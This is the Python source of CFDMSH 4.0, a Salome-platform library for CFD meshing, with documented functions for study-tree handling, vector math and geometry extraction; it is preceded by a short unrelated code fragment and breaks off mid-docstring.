# todo: result = Extinctions.from_merged_signals()
ext = None
pass
return ext
registry.register_class(ExtinctionFactory,
ExtinctionFactoryDefault.__name__,
ExtinctionFactoryDefault)
registry.register_class(CalcExtinction,
CalcExtinctionDefault.__name__,
CalcExtinctionDefault)
|
<reponame>tizon9804/SS2017<gh_stars>0
"""
++++++++++
+ CFDMSH +
++++++++++
Python Library for CFD Meshing with Salome Platform
Author: <NAME>. (www.tougeron-cfd.com)
Licence: GNU General Public License
"""
version = "4.0"
import salome, salome.geom.geomtools
import GEOM
from salome.geom import geomBuilder
geompy = geomBuilder.New(salome.myStudy)
import SMESH, SALOMEDS
from salome.smesh import smeshBuilder
smesh = smeshBuilder.New(salome.myStudy)
from salome.StdMeshers import StdMeshersBuilder
#import numpy
import time
import random
import ast
import csv
import os
import math
#### Here are internal functions ####
def ListComponentShapes( comp = "GEOM", output = "name", rec = True ):
"""
Description:
Gives the list of all objects published in a Salome component, being GEOM or SMESH.
Arguments:
# comp
Description: The name of the component : "GEOM" or "SMESH".
Type: String
GUI selection: -
Selection by name: -
Recursive: -
Default value: "GEOM"
# output
Description: Defines if the returned values should be the "name" or the "id" of the found shapes.
Type: String
GUI selection: -
Selection by name: -
Recursive: -
Default value: "name"
# rec
Description: If equals False, the function will only iterate over the first level of the study tree.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: True
Returned Values:
"dim" value: -
"single" value: -
Type: String
Number: n
Name: -
Conditions of use:
-
"""
# Make this function recursive
if isinstance(comp, list):
return_list = []
for sub_object in comp:
return_list.append(ListComponentShapes(sub_object, output, rec))
return return_list
#-
if comp not in ["GEOM", "SMESH"]:
return []
component = salome.myStudy.FindComponent(comp)
sub_shape_list = []
try:
child_iterator = salome.myStudy.NewChildIterator(component)
child_iterator.InitEx(rec)
while(child_iterator.More()):
sub_object = child_iterator.Value()
if sub_object.GetAllAttributes():
if output == "name":
sub_shape = sub_object.GetName()
elif output in ["id", "ID"]:
sub_shape = salome.ObjectToID(sub_object.GetObject())
else:
sub_shape = None
sub_shape_list.append(sub_shape)
child_iterator.Next()
except:
pass
return sub_shape_list
lcs = ListComponentShapes
def CheckObjectExistence( name, comp = "GEOM" ):
"""
Description:
Checks if an object is already published in the study tree, according to its name and component.
Arguments:
# name
Description: The name of the shape.
Type: String
GUI selection: -
Selection by name: -
Recursive: -
Default value: -
# comp
Description: The name of the component : "GEOM" or "SMESH".
Type: String
GUI selection: -
Selection by name: -
Recursive: -
Default value: "GEOM"
Returned Values:
"dim" value: -
"single" value: -
Type: Boolean
Number: 1
Name: -
Conditions of use:
-
"""
# Make this function recursive
if isinstance(name, list):
return_list = []
for sub_object in name:
return_list.append(CheckObjectExistence(sub_object, comp))
return return_list
#-
else:
# Get the existing names
name_list = ListComponentShapes(comp)
#-
# Check the object existence
if name == None:
return None
elif name in name_list:
return True
else:
return False
#-
coe = CheckObjectExistence
def GetNextNameIndex( name, comp = "GEOM" ):
"""
Description:
Gives the next name index of a given name to be published in the study tree.
Arguments:
# name
Description: The name of the shape.
Type: String
GUI selection: -
Selection by name: -
Recursive: -
Default value: -
# comp
Description: The name of the component : "GEOM" or "SMESH".
Type: String
GUI selection: -
Selection by name: -
Recursive: -
Default value: "GEOM"
Returned Values:
"dim" value: -
"single" value: -
Type: Integer
Number: 1
Name: -
Conditions of use:
-
"""
# Get the existing names
name_list = ListComponentShapes(comp)
#-
name += "_"
# Get the existing indexes
existing_indexes = []
for existing_name in name_list:
if existing_name.find(name) != -1:
name_ending = existing_name.split(name)[1]
try:
index = int(name_ending)
existing_indexes.append(index)
except:
pass
#-
# Sort the existing indexes list
existing_indexes = list(set(existing_indexes))
existing_indexes.sort()
#-
# Get the next index
i = 1
for existing_index in existing_indexes:
if existing_index != i:
break
i += 1
next_index = str(i)
#-
# Return the index
return next_index
#-
gnni = GetNextNameIndex
def AddToStudy( object, name = "Geometrical Object", father = None, suffix = True, disp = True, refresh = True ):
"""
Description:
Flexibly publishes an object in the study tree.
Arguments:
# object
Description: The object to publish.
Type: Any geometrical object
GUI selection: -
Selection by name: -
Recursive: yes
Default value: -
# name
Description: The name to give to the shape in the study tree.
Type: String
GUI selection: -
Selection by name: -
Recursive: -
Default value: "Geometrical Object"
# father
Description: The geometrical shape in which to add the published shape.
Type: Any geometrical object
GUI selection: -
Selection by name: -
Recursive: -
Default value: None
# suffix
Description: Determines if a suffix (eg. "_1") as to be added to the name of the shape to publish.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: True
# disp
Description: Determines if the shape has to be displayed in the 3D window after publication.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: True
# refresh
Description: Determines if the study tree has to be refreshed after publication.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: True
Returned Values:
"dim" value: -
"single" value: -
Type: -
Number: -
Name: -
Conditions of use:
-
"""
if isinstance(object, list):
for sub_object in object:
AddToStudy(sub_object, name, father, suffix, disp, refresh)
else:
if not isinstance(name, str):
name = str(name)
if suffix == True:
index = GetNextNameIndex(name)
name += "_"
name += index
if father == None:
id = geompy.addToStudy(object, name)
else:
id = geompy.addToStudyInFather(father, object, name)
if refresh == True:
if disp == True:
gg = salome.ImportComponentGUI("GEOM")
gg.createAndDisplayGO(id)
else:
if salome.sg.hasDesktop():
salome.sg.updateObjBrowser(1)
ats = AddToStudy
def GetObject( object = None, comp = "GEOM", silent = False ):
"""
Description:
Gets a published object, according to its name in the study tree and its component.
Arguments:
# object
Description: The name of the object to get.
Type: String
GUI selection: -
Selection by name: -
Recursive: -
Default value: -
# comp
Description: The name of the component : "GEOM" or "SMESH".
Type: String
GUI selection: -
Selection by name: -
Recursive: -
Default value: "GEOM"
# silent
Description: Determines if the error message, in case no object was found, has to be hidden or not.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: False
Returned Values:
"dim" value: -
"single" value: -
Type: Any object
Number: 1
Name: -
Conditions of use:
-
"""
# Make this function recursive
if isinstance(object, list):
return_list = []
for sub_object in object:
return_list.append(GetObject(sub_object, comp, silent))
return return_list
#-
if isinstance(object, str):
if CheckObjectExistence(object, comp):
object = salome.myStudy.FindObjectByName(object, comp)[0].GetObject()
else:
if silent == False:
print "[X] The object", object, "doesn't exist in the study tree."
return "error"
return object
go = GetObject
def GetSubShapes( shape ):
"""
Description:
Gets all sub-vertexes, sub-edges, sub-faces and sub-solids of a geometrical shape.
Arguments:
# shape
Description: The shape from which to get sub shapes.
Type: Any geometrical object
GUI selection: -
Selection by name: -
Recursive: -
Default value: -
Returned Values:
"dim" value: -
"single" value: -
Type: Geometrical object or List of Geometrical objects (see the "Additional Information")
Number: 5
Name: -
Conditions of use:
-
"""
# Make this function recursive
if isinstance(shape, list):
return_list = []
for sub_shape in shape:
return_list.append(GetSubShapes(sub_shape))
return return_list
#-
shape_vertexes = geompy.SubShapeAll(shape, geompy.ShapeType["VERTEX"])
shape_edges = geompy.SubShapeAll(shape, geompy.ShapeType["EDGE"])
shape_faces = geompy.SubShapeAll(shape, geompy.ShapeType["FACE"])
shape_solids = geompy.SubShapeAll(shape, geompy.ShapeType["SOLID"])
return [shape_vertexes, shape_edges, shape_faces, shape_solids, shape]
gss = GetSubShapes
def GetGUISelection( shape = None, uniq = False ):
"""
Description:
Gets the objects selected in the GUI.
Arguments:
# shape
Description: The input shape. If different that None, this shape is returned instead of the GUI selection.
Type: Any object
GUI selection: -
Selection by name: -
Recursive: -
Default value: None
# uniq
Description: Allows to restrict the number of returned objects to one.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: False
Returned Values:
"dim" value: -
"single" value: -
Type: Any object
Number: n
Name: -
Conditions of use:
-
"""
if shape == None or shape == [None]:
selected_object_ids = salome.sg.getAllSelected()
if len(selected_object_ids) > 0:
selected_objects = []
for selected_object_id in selected_object_ids:
selected_objects.append(salome.myStudy.FindObjectID(selected_object_id).GetObject())
if (shape == None and len(selected_objects) == 1) or (uniq == True):
shape = selected_objects[0]
if len(selected_objects) > 1 and uniq == True:
print "[i] Only one object processed over " + str(len(selected_object_ids)) + "."
else:
shape = selected_objects
return shape
ggs = GetGUISelection
def PrintDefinedFunctions( cond = False ):
"""
Description:
Displays the list of all available cfdmsh functions.
Arguments:
# cond
Description: Allows to display the function names in condensed mode.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: False
Returned Values:
"dim" value: -
"single" value: -
Type: -
Number: -
Name: -
Conditions of use:
-
"""
if cond == True:
print """ListComponentShapes
CheckObjectExistence
GetNextNameIndex
AddToStudy
GetObject
GetSubShapes
GetGUISelection
PrintDefinedFunctions
PrintVersion
GetBoundaryVertexes
GetReorderedEdges
GetNormalizedVector
GetCrossProduct
GetDotProduct
GetTurnAngle
GeometricalEquality
GetBoundaryFaces
GetTriEdgeFaces
RebuildSpline
SplitEdge
DiscretizeEdgeByCurvature
FuseSplines
ExtendSpline
ExtendSplinesToIntersection
FuseSplineSets
UnrefineSplineSet
SwitchSplineSet
RebuildFace
FuseCoplanarFaces
FuseShellFaces
FuseGroupFaces
RemoveFaceExtraEdges
MakeFoilTrailingFillets
MakeMiddleSpline
MakeCurveFromUnsortedVertexes
MakeEllipticalFilling
MakeFillingFromUnsortedEdges
MakeFoilFromUnsortedVertexes
MakeEdgeOffset
MakePlanarWireOffset
CloseViscousLayer
ExtendViscousLayer
PropagateViscousLayerIntersection
MakeTipViscousLayer
CloseTipViscousLayer
ExtendTipViscousLayer
MakeLinkingSolids
CopyGeometricalGroups
ExportGeometricalGroups
ImportGeometricalGroups
PutAllSubShapesInAGroup
SetRandomColors
ExportCSVFile
ImportCSVFile
MakeVirtualOffsetEdgeSubmeshes
MakeTriEdgeFaceSubmeshes
ProjectEdgeSubmesh
MakeNetgenRefinement
SetNetgenRefinement
ClearNetgenRefinement
ProjectMeshGroupOnFace
MakeVertexesFromMeshGroup
RotateFlapGenerateAndExportMeshInAmshFormat
ViscousLayerScaleFactor
ExportMeshConfiguration
ImportMeshConfiguration
ExportHypotheses
ImportHypotheses
ExportAmshFile
ExportSU2File"""
else:
print """
Defined Functions:
Internal Functions
==================
List Component Shapes
Check Object Existence
Get Next Name Index
Add To Study
Get Object
Get Sub Shapes
Get GUI Selection
Print Defined Functions
Print Version
Geometry Module
===============
Measurement
...........
Edges
Get Boundary Vertexes
Get Reordered Edges
Vectors
Get Normalized Vector
Get Cross Product
Get Dot Product
Get Turn Angle
Any Shape
Geometrical Equality
Get Boundary Faces
Get Tri Edge Faces
Repair
......
Splines or Edges
Rebuild Spline
Split Edge
Discretize Edge By Curvature
Fuse Splines
Extend Spline
Extend Splines To Intersection
Spline Sets
Fuse Spline Sets
Unrefine Spline Set
Switch Spline Set
Faces
Rebuild Face
Fuse Coplanar Faces
Fuse Shell Faces
Fuse Group Faces
Remove Face Extra Edges
Foils
Make Foil Trailing Fillets
Basic Geometry Generation
.........................
Splines
Make Middle Spline
Make Curve From Unsorted Vertexes
Faces
Make Elliptical Filling
Make Filling From Unsorted Edges
Foils
Make Foil From Unsorted Vertexes
Viscous Layer Generation
........................
2D
Make Edge Offset
Make Planar Wire Offset
Extend Viscous Layer
Close Viscous Layer
Propagate Viscous Layer Intersection
3D
Make Tip Viscous Layer
Extend Tip Viscous Layer
Close Tip Viscous Layer
Make Linking Solids
Group Management
................
Copy Geometrical Groups
Export Geometrical Groups
Import Geometrical Groups
Put All Sub Shapes In A Group
Rendering
.........
Set Random Colors
Import / Export
...............
Export CSV File
Import CSV File
Geometry + Mesh modules
=======================
Viscous Layer Meshing
.....................
Make Virtual Offset Edge Submesh
Make Tri Edge Face Submeshes
Project Edge Submesh
Netgen Refinement
.................
Make Netgen Refinement
Set Netgen Refinement
Clear Netgen Refinement
Mesh Repair
...........
Project Mesh Group On Face
Mesh to Geometry Conversion
...........................
Make Vertexes From Mesh Group
Parametric Meshing
..................
Rotate Flap Generate And Export Mesh In Amsh Format
Mesh Module
===========
Viscous Layer Meshing
.....................
Viscous Layer Scale Factor
Mesh Management
...............
Export Mesh Configuration
Import Mesh Configuration
Hypothesis Management
.....................
Export Hypotheses
Import Hypotheses
Mesh Export
...........
Export Amsh File
Export SU2 File
"""
pdf = PrintDefinedFunctions
def PrintVersion( ):
"""
Description:
Displays the cfdmsh version.
Arguments:
# -
Description: -
Type: -
GUI selection: -
Selection by name: -
Recursive: -
Default value: -
Returned Values:
"dim" value: -
"single" value: -
Type: -
Number: -
Name: -
Conditions of use:
-
"""
print "Version:"
print version
pv = PrintVersion
#### - ####
#### Here are beta cfdmsh functions ####
#### - ####
def GetBoundaryVertexes( wire = None, tol = 1e-7, single = True, add = True, infa = True ):
"""
Description:
Gets boundary vertexes from a wire and put them into a group.
Arguments:
# wire
Description: The input wire.
Type: Wire
GUI selection: yes
Selection by name: yes
Recursive: yes
Default value: None
# tol
Description: See here.
Type: Float
GUI selection: -
Selection by name: -
Recursive: -
Default value: 1e-7
# single
Description: See here.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: True
# add
Description: See here.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: True
# infa
Description: See here.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: True
Returned Values:
"dim" value: -
"single" value: False
Type: Vertex
Number: 2
Name: "BoundaryVertex"
"dim" value: -
"single" value: True
Type: Compound or Group of Vertexes
Number: 1
Name: "BoundaryVertexes"
Conditions of use:
-
"""
input_shape = wire
# Get the input shape(s)
input_shape = GetGUISelection(input_shape)
input_shape = GetObject(input_shape)
#-
# Make this function recursive
if isinstance(input_shape, list):
return_list = []
for sub_object in input_shape:
return_list.append(GetBoundaryVertexes(sub_object, tol, single, add, infa))
return return_list
#-
# Check the input shape existence
if "error" in [input_shape] or None in [input_shape]: return
#-
# Set father object
father = None
if infa == True: father = input_shape
#-
wire = input_shape
if False: pass
else:# All checks done
# Get the sub-shapes
wire_edge_list = geompy.SubShapeAll(wire, geompy.ShapeType["EDGE"])
wire_vertex_list = geompy.SubShapeAll(wire, geompy.ShapeType["VERTEX"])
#-
# Get the boundary vertexes
boundary_vertex_list = []
for vertex in wire_vertex_list:
nb_touching_edges = 0
for edge in wire_edge_list:
distance = geompy.MinDistance(edge, vertex)
if distance < tol:
nb_touching_edges += 1
if nb_touching_edges == 1:
boundary_vertex_list.append(vertex)
#-
# Detect closed wire
if len(boundary_vertex_list) < 2:
boundary_vertex_list = []
#-
if len(boundary_vertex_list) == 0:
return
to_return = boundary_vertex_list
to_return_name = "BoundaryVertexes"
if single == True:
to_return_name = "BoundaryVertex"
if infa == True:
# Create the boundary vertex group
boundary_vertex_group = geompy.CreateGroup(father, geompy.ShapeType["VERTEX"])
#-
for boundary_vertex in boundary_vertex_list:# For each boundary vertex...
# Get the boundary vertex ID
boundary_vertex_id = geompy.GetSubShapeID(father, boundary_vertex)
#-
# Put the boundary vertex in the group
geompy.AddObject(boundary_vertex_group, boundary_vertex_id)
#-
to_return = boundary_vertex_group
else:
compound = geompy.MakeCompound(boundary_vertex_list)
to_return = compound
# Add and return the resulting shape(s)
if add == True:
AddToStudy(to_return, to_return_name, father)
return to_return
#-
gbv = GetBoundaryVertexes
def GetReorderedEdges( wire = None, tol = 1e-9, add = True, infa = False ):
"""
Description:
Gets reordered edges from a wire, starting from one of its boundaries if open.
Arguments:
# wire
Description: The input wire.
Type: Wire
GUI selection: yes
Selection by name: yes
Recursive: yes
Default value: None
# tol
Description: See here.
Type: Float
GUI selection: -
Selection by name: -
Recursive: -
Default value: 1e-7
# add
Description: See here.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: True
# infa
Description: See here.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: False
Returned Values:
"dim" value: -
"single" value: -
Type: Edge
Number: n
Name: "ReorderedEdge"
Conditions of use:
-
"""
input_shape = wire
# Get the input shape(s)
input_shape = GetGUISelection(input_shape)
input_shape = GetObject(input_shape)
#-
# Make this function recursive
if isinstance(input_shape, list):
return_list = []
for sub_object in input_shape:
return_list.append(GetReorderedEdges(sub_object, tol, add, infa))
return return_list
#-
# Check the input shape existence
if "error" in [input_shape] or None in [input_shape]: return
#-
# Set father object
father = None
if infa == True: father = input_shape
#-
wire = input_shape
if False: pass
else:# All checks done
resting_edges = geompy.SubShapeAll(wire, geompy.ShapeType["EDGE"])
nb_edges = len(resting_edges)
# Get boundary vertexes
boundary_vertexes = GetBoundaryVertexes(wire, add = False, single = False)
#-
# Check if the wire is closed
wire_is_closed = False
if boundary_vertexes == None:
wire_is_closed = True
#-
# Detect the first edge
found = False
if wire_is_closed == False:
boundary_vertex = boundary_vertexes[0]
for i in range(nb_edges):
the_edge = resting_edges[i]
distance = geompy.MinDistance(the_edge, boundary_vertex)
if distance <= tol:
first_edge = resting_edges.pop(i)
found = True
break
if found == False:
first_edge = resting_edges.pop()
#-
first_edge_vertexes = geompy.SubShapeAll(first_edge, geompy.ShapeType["VERTEX"])
first_edge_vertex_compound = geompy.MakeCompound(first_edge_vertexes)
# Sort the resting edges
sorted_edges = [first_edge]
n = 0
while len(resting_edges) > 0:
i = 0
for edge in resting_edges:
edge_vertexes = geompy.SubShapeAll(edge, geompy.ShapeType["VERTEX"])
edge_vertex_compound = geompy.MakeCompound(edge_vertexes)
distance = geompy.MinDistance(first_edge_vertex_compound, edge_vertex_compound)
if distance <= tol:
first_vertex = geompy.MakeVertexOnCurve(edge, 0.0)
last_vertex = geompy.MakeVertexOnCurve(first_edge, 1.0)
distance = geompy.MinDistance(first_vertex, last_vertex)
first_edge = resting_edges.pop(i)
if distance > tol:
first_edge = geompy.ChangeOrientation(first_edge)
first_edge_vertexes = geompy.SubShapeAll(first_edge, geompy.ShapeType["VERTEX"])
first_edge_vertex_compound = geompy.MakeCompound(first_edge_vertexes)
sorted_edges.append(first_edge)
break
i += 1
if n >= 9999:
print "[X] Infinite loop during edge reordering."
break
n += 1
#-
# Add and return the resulting shape(s)
if add == True:
AddToStudy(sorted_edges, "ReorderedEdge", father)
return sorted_edges
#-
gre = GetReorderedEdges
def GetNormalizedVector( vector = None, add = True, infa = False ):
"""
Description:
Normalizes a 3D vector.
Arguments:
# vector
Description: The input vector.
Type: Vector
GUI selection: yes
Selection by name: yes
Recursive: yes
Default value: None
# add
Description: See here.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: True
# infa
Description: See here.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: False
Returned Values:
"dim" value: -
"single" value: -
Type: Vector
Number: 1
Name: "NormalizedVector"
Conditions of use:
-
"""
input_shape = vector
# Get the input shape(s)
input_shape = GetGUISelection(input_shape)
input_shape = GetObject(input_shape)
#-
# Make this function recursive
if isinstance(input_shape, list):
return_list = []
for sub_object in input_shape:
return_list.append(GetNormalizedVector(sub_object, add, infa))
return return_list
#-
# Check the input shape existence
if "error" in [input_shape] or None in [input_shape]: return
#-
# Set father object
father = None
if infa == True: father = input_shape
#-
vector = input_shape
if False: pass
else:# All checks done
base_vertex = geompy.MakeVertexOnCurve(vector, 0)
magnitude = geompy.BasicProperties(vector)[0]
normalized_vector = geompy.MakeScaleTransform(vector, base_vertex, 1.0 / magnitude)
# Add and return the resulting shape(s)
if add == True:
AddToStudy(normalized_vector, "NormalizedVector")
return normalized_vector
#-
gnv = GetNormalizedVector
def GetCrossProduct( vector_1, vector_2, tol = 1e-7, add = True ):
"""
Description:
Computes the cross product between two 3D vectors.
Arguments:
# vector_1
Description: The first vector.
Type: Vector
GUI selection: -
Selection by name: yes
Recursive: -
Default value: None
# vector_2
Description: The second vector.
Type: Vector
GUI selection: -
Selection by name: yes
Recursive: -
Default value: None
# tol
Description: See here.
Type: Float
GUI selection: -
Selection by name: -
Recursive: -
Default value: 1e-7
# add
Description: See here.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: True
Returned Values:
"dim" value: -
"single" value: -
Type: Vector
Number: 1
Name: "CrossProduct"
Conditions of use:
-
"""
input_shapes = [vector_1, vector_2]
# Get the input shape(s)
input_shapes = GetObject(input_shapes)
#-
# Check the input shape existence
if "error" in input_shapes or None in input_shapes: return
#-
[vector_1, vector_2] = input_shapes
if False: pass
else:# All checks done
base_vertex = geompy.MakeVertexOnCurve(vector_1, 0)
origin = geompy.MakeVertex(0, 0, 0)
c1 = geompy.VectorCoordinates(vector_1)
c2 = geompy.VectorCoordinates(vector_2)
x = c1[1] * c2[2] - c1[2] * c2[1]
y = c1[2] * c2[0] - c1[0] * c2[2]
z = c1[0] * c2[1] - c1[1] * c2[0]
vector_product_norm = math.sqrt(pow(x,2) + pow(y,2) + pow(z,2))
if vector_product_norm > tol:
vector_product = geompy.MakeVectorDXDYDZ(x, y, z)
vector_product = geompy.MakeTranslationTwoPoints(vector_product, origin, base_vertex)
else:
vector_product = None
# Add and return the resulting shape(s)
if add == True and vector_product != None:
AddToStudy(vector_product, "CrossProduct")
return vector_product
#-
gcp = GetCrossProduct
def GetDotProduct( vectors = [None] ):
"""
Description:
Computes the dot product between two 3D vectors.
Arguments:
# vectors
Description: The input vectors.
Type: List of 2 Vectors
GUI selection: yes
Selection by name: yes
Recursive: -
Default value: [None]
Returned Values:
"dim" value: -
"single" value: -
Type: Float
Number: 1
Name: -
Conditions of use:
-
"""
if isinstance(vectors, list) == False: print "[X] The first argument (vectors) should be an array."; return
input_shapes = vectors
# Get the input shape(s)
input_shapes = GetGUISelection(input_shapes)
input_shapes = GetObject(input_shapes)
#-
# Check the input shape existence
if "error" in input_shapes or None in input_shapes: return
#-
# Check the number of selected objects
if len(input_shapes) != 2:
print "[X] Two shapes should be selected."
return
#-
vectors = input_shapes
if False: pass
else:# All checks done
c1 = geompy.VectorCoordinates(vectors[0])
c2 = geompy.VectorCoordinates(vectors[1])
dot_product = c1[0] * c2[0] + c1[1] * c2[1] + c1[2] * c2[2]
return dot_product
gdp = GetDotProduct
def GetTurnAngle( vector_1, vector_2, normal, unit = "rad" ):
"""
Description:
Gets the "turn angle" between two vectors.
Arguments:
# vector_1
Description: The first vector.
Type: Vector
GUI selection: -
Selection by name: yes
Recursive: -
Default value: None
# vector_2
Description: The second vector.
Type: Vector
GUI selection: -
Selection by name: yes
Recursive: -
Default value: None
# normal
Description: The reference vector indicating the angle orientation, being normal to other input vectors.
Type: Vector
GUI selection: -
Selection by name: yes
Recursive: -
Default value: None
# unit
Description: Defines the return unit. Can equal "rad" or "deg".
Type: String
GUI selection: -
Selection by name: -
Recursive: -
Default value: "rad"
Returned Values:
"dim" value: -
"single" value: -
Type: Float
Number: 1
Name: -
Conditions of use:
-
"""
input_shapes = [vector_1, vector_2, normal]
# Get the input shape(s)
input_shapes = GetObject(input_shapes)
#-
# Check the input shape existence
if "error" in input_shapes or None in input_shapes: return
#-
[vector_1, vector_2, normal] = input_shapes
if False: pass
else:# All checks done
vector_1 = GetNormalizedVector(vector_1, add = False)
vector_2 = GetNormalizedVector(vector_2, add = False)
dot_product = GetDotProduct([vector_1, vector_2])
vector_product = GetCrossProduct(vector_1, vector_2, add = False)
if vector_product == None:
coord_1 = geompy.VectorCoordinates(vector_1)
coord_2 = geompy.VectorCoordinates(vector_2)
vertex_1 = geompy.MakeVertex(coord_1[0], coord_1[1], coord_1[2])
vertex_2 = geompy.MakeVertex(coord_2[0], coord_2[1], coord_2[2])
distance = geompy.MinDistance(vertex_1, vertex_2)
tol = 0.1
if distance < tol:
angle = 0.0
else:
angle = math.pi
else:
angle = math.acos(dot_product)
if GetDotProduct([vector_product, normal]) < 0:
angle = 2 * math.pi - angle
if unit != "rad":
angle = angle / math.pi * 180.0
return angle
gta = GetTurnAngle
def GeometricalEquality( shapes = [None], tol = 1e-7 ):
"""
Description:
Compares the shapes of two geometrical objects.
Arguments:
# shapes
Description: Geometrical objects to be compared.
Type: List of 2 Geometrical objects
GUI selection: yes
Selection by name: yes
Recursive: -
Default value: [None]
# tol
Description: Maximum difference allowed between all the shape parameters.
Type: Float
GUI selection: -
Selection by name: -
Recursive: -
Default value: 1e-7
Returned Values:
"dim" value: -
"single" value: -
Type: Boolean
Number: 1
Name: -
Conditions of use:
-
"""
if isinstance(shapes, list) == False: print "[X] The first argument (shapes) should be an array."; return
# Get the input shape(s)
shapes = GetGUISelection(shapes)
shapes = GetObject(shapes)
#-
# Check the input shape existence
if "error" in shapes or None in shapes: return
#-
# Check the number of selected objects
if len(shapes) != 2:
print "[X] Two shapes should be selected."
return
#-
else:# All checks done
is_equal = False
# Check the centers of mass
centers_of_mass = [
geompy.MakeCDG(shapes[0]),
geompy.MakeCDG(shapes[1])
]
distance = geompy.MinDistance(centers_of_mass[1], centers_of_mass[0])
#-
if distance <= tol:# If they are equals...
# Check the basic properties
basic_properties = [
geompy.BasicProperties(shapes[0]),
geompy.BasicProperties(shapes[1])
]
for i in range(len(basic_properties[0])):
difference = abs(basic_properties[1][i] - basic_properties[0][i])
if difference > tol:
break
#-
if i == len(basic_properties[0]) - 1:# If they are equal...
# Check the inertia matrices
inertia_matrices = [
geompy.Inertia(shapes[0]),
geompy.Inertia(shapes[1])
]
for i in range(len(inertia_matrices[0])):
difference = abs(inertia_matrices[1][i] - inertia_matrices[0][i])
if difference > tol:
break
#-
if i == len(inertia_matrices[0]) - 1:# If they are equal...
# Say the shapes are equal
is_equal = True
#-
# Return the result
return is_equal
#-
ge = GeometricalEquality
def GetBoundaryFaces( compound = None, single = True, add = True, infa = True ):
"""
Description:
Get the boundary faces of a solid compound and put them in a group.
Arguments:
# compound
Description: The input compound of solids.
Type: Compound of Solids
GUI selection: yes
Selection by name: yes
Recursive: yes
Default value: None
# single
Description: See here.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: True
# add
Description: See here.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: True
# infa
Description: See here.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: True
Returned Values:
"dim" value: -
"single" value: False
Type: Face
Number: n
Name: "BoundaryVertex"
"dim" value: -
"single" value: True
Type: Compound or Group of Faces
Number: 1
Name: "BoundaryVertexes"
Conditions of use:
-
"""
# Get the input shape(s)
compound = GetGUISelection(compound)
compound = GetObject(compound)
#-
# Make this function recursive
if isinstance(compound, list):
return_list = []
for sub_object in compound:
return_list.append(GetBoundaryFaces(sub_object, single, add, infa))
return return_list
#-
# Check the input shape existence
if "error" in [compound] or None in [compound]: return
#-
# Set father object
father = None
if infa == True: father = compound
#-
if False: pass
else:# All checks done
# Get the sub-shapes
compound = GetSubShapes(compound)
#-
# Get the boundary face IDs
boundary_face_ids = geompy.GetFreeFacesIDs(compound[-1])
#-
# Create the boundary face group
boundary_face_group = geompy.CreateGroup(compound[-1], geompy.ShapeType["FACE"])
#-
boundary_face_list = []
for face in compound[2]:# For each face of the compound...
# Get the face ID
face_id = geompy.GetSubShapeID(compound[-1], face)
#-
# Put the face in the group
if face_id in boundary_face_ids:
geompy.AddObject(boundary_face_group, face_id)
boundary_face_list.append(face)
#-
to_return = boundary_face_list
to_return_name = "BoundaryFace"
if single == True:
to_return_name = "BoundaryFaces"
if infa == True:
to_return = boundary_face_group
else:
compound = geompy.MakeCompound(boundary_face_list)
to_return = compound
# Add and return the resulting shape(s)
if add == True:
slow_add = False
if not isinstance(to_return, list) or single == True: slow_add = True
AddToStudy(to_return, to_return_name, father, suffix = slow_add, refresh = slow_add)
if slow_add == False:
if salome.sg.hasDesktop():
salome.sg.updateObjBrowser(1)
return to_return
#-
gbf = GetBoundaryFaces
def GetTriEdgeFaces( shape = None, tol = 1e-7, add = True ):
"""
Description:
Get all the surfaces having three edges and put them in separated groups.
Arguments:
# shape
Description: The shape in which to look for tri-edge faces.
Type: Any geometrical object
GUI selection: yes
Selection by name: yes
Recursive: yes
Default value: None
# tol
Description: See here.
Type: Float
GUI selection: -
Selection by name: -
Recursive: -
Default value: 1e-7
# add
Description: See here.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: True
Returned Values:
"dim" value: -
"single" value: -
Type: Group of Faces
Number: n
Name: "TriEdgeFace"
Conditions of use:
-
"""
# Get the input shape(s)
shape = GetGUISelection(shape)
shape = GetObject(shape)
#-
# Make this function recursive
if isinstance(shape, list):
return_list = []
for sub_object in shape:
return_list.append(GetTriEdgeFaces(sub_object, tol, add))
return return_list
#-
# Check the input shape existence
if "error" in [shape] or None in [shape]: return
#-
else:# All checks done
# Get the sub-shapes
shape = GetSubShapes(shape)
#-
# Get the triangles
shape_triangles = []
for shape_face in shape[2]:
shape_face_description = geompy.WhatIs(shape_face)
if "EDGE : 3" in shape_face_description:
shape_triangles.append(shape_face)
#-
# Create groups
shape_triangle_groups = []
for shape_triangle in shape_triangles:# For each list of adjacent triangles...
# Create a group
new_group = geompy.CreateGroup(shape[-1], geompy.ShapeType["FACE"])
#-
# Get the ID of the triangle
shape_triangle_id = geompy.GetSubShapeID(shape[-1], shape_triangle)
#-
# Add the triangle to the group
geompy.AddObject(new_group, shape_triangle_id)
#-
# Add the group to the list
shape_triangle_groups.append(new_group)
#-
#-
# Add and return the resulting shape(s)
if add == True:
for shape_triangle_group in shape_triangle_groups:
AddToStudy(shape_triangle_group, "TriEdgeFace", father = shape[-1])
return shape_triangle_groups
#-
gtef = GetTriEdgeFaces
def RebuildSpline( np = 20, edge = None, single = True, add = True, infa = False, dim = 1 ):
"""
Description:
Rebuilds an edge with a spline.
Arguments:
# np
Description: See here. In addition, the value of this argument can be a list of parameters (from 0.0 to 1.0) which will be used to create the internal list of vertexes.
Type: Integer or List of Floats
GUI selection: -
Selection by name: -
Recursive: -
Default value: 20
# edge
Description: The edge to rebuild.
Type: Edge
GUI selection: yes
Selection by name: yes
Recursive: yes
